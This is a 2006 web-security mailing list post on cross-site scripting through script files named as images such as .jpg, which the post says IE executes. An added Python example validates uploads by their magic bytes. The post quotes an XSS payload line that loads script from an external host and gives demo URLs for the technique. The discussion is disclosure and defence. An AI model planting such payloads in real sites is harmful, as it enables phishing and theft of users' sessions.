[WEB SECURITY] (XSS via file extension) XSS-Phishing on Financial Sites

Evans, Arian Arian.Evans at fishnetsecurity.com
Mon Jun 26 14:09:19 EDT 2006


> -----Original Message-----
> From: RSnake [mailto:rsnake at shocking.com] 
> Sent: Sunday, June 25, 2006 11:49 PM

[...]lots of good stuff removed

>  But to answer your question
> <script src="http://ha.ckers.org/xss.jpg"></script>
> will continue to work

There are a couple of ways you can do this, as I'm sure
you are aware, but I haven't seen this well documented
in the past. This, for example, is all you need in IE:

http://www.anachronic.com/xss/scriptalert.jpg

Anywhere you can embed/reference an image, IE will execute
script types it understands for image (any) extensions it has
native shell extension handling configured to use itself for.

If you can get the image to 'render' inline of an existing script,
you may be able to get away with a simple directive as such:

http://www.anachronic.com/xss/shortalert.jpg

It's quite fun, and most web-based DMSes are vulnerable to
this type of abuse, say *nothing* of the zillions of sites
that allow custom avatars.

This is definitely something the browser could kibosh
short-term, though long term you'd think DMS systems would
want to validate all user supplied data, including the
/documents/ themselves.

-ae
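The server-side validation the post calls for, as an added example that is not part of the original message: an upload named like an image is accepted only if its bytes carry the magic signature of that same image type, so a script file renamed to .jpg is refused before it can be served from an avatar or document URL. The signature table, function names and sample bytes are constructed for this example.

```python
# Added example, not from the original post: validate an avatar/document
# upload by its content, not its file name, and derive the Content-Type we
# will later serve from the verified bytes rather than from the extension.

# Magic-byte signatures of the image types we are willing to accept.
SIGNATURES = {
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/gif": (b"GIF87a", b"GIF89a"),
}
# Extension allow-list mapped to the type each extension claims to be.
ALLOWED_EXTENSIONS = {
    "jpg": "image/jpeg",
    "jpeg": "image/jpeg",
    "png": "image/png",
    "gif": "image/gif",
}


def sniff_image_type(data: bytes):
    """Return the MIME type whose signature the bytes start with, else None."""
    for mime, sigs in SIGNATURES.items():
        if any(data.startswith(sig) for sig in sigs):
            return mime
    return None


def validate_image_upload(filename: str, data: bytes):
    """Return (accepted, content_type_or_reason).

    Accept only when the extension is allow-listed AND the body starts with
    the magic bytes of that same type. A script with a .jpg name, a PNG named
    .gif, or a file with no extension is all refused."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    claimed = ALLOWED_EXTENSIONS.get(ext)
    if claimed is None:
        return False, "extension not allowed: %r" % ext
    actual = sniff_image_type(data)
    if actual is None:
        return False, "body is not a recognised image (possible script)"
    if actual != claimed:
        return False, "extension says %s but bytes say %s" % (claimed, actual)
    return True, actual


if __name__ == "__main__":
    # Constructed samples: a minimal JPEG prefix and a script disguised as .jpg.
    real_jpeg = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
    fake_jpeg = b"alert('xss')"
    print(validate_image_upload("avatar.jpg", real_jpeg))       # (True, 'image/jpeg')
    print(validate_image_upload("scriptalert.jpg", fake_jpeg))  # (False, ...)
```

Serving the file with the Content-Type returned here (and never the one the client supplied) is what keeps the browser from treating the upload as script.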

----------------------------------------------------------------------------
The Web Security Mailing List: 
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]